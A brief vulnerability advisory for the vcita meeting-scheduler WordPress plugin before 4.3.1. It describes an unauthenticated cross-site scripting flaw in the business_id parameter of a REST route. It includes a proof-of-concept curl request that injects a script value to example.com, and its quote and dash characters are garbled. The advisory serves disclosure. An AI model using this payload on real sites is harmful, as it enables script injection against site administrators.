The plugin does not sanitize and escape the business_id parameter of an unprotected REST route endpoint before rendering it back in pages on the website, allowing an unauthenticated attacker to inject arbitrary web scripts, which could target authenticated users such as administrators.
curl https://example.com/wp-json/vcita-wordpress/v1/actions/auth \ βjson β{ βsuccessβ: true, βuser_dataβ: { βbusiness_idβ: β"; alert(1); //β, βbusiness_nameβ: βEvil Eveβ, βemailβ: β[email protected]β } }β
CPE | Name | Operator | Version |
---|---|---|---|
meeting-scheduler-by-vcita | lt | 4.3.1 |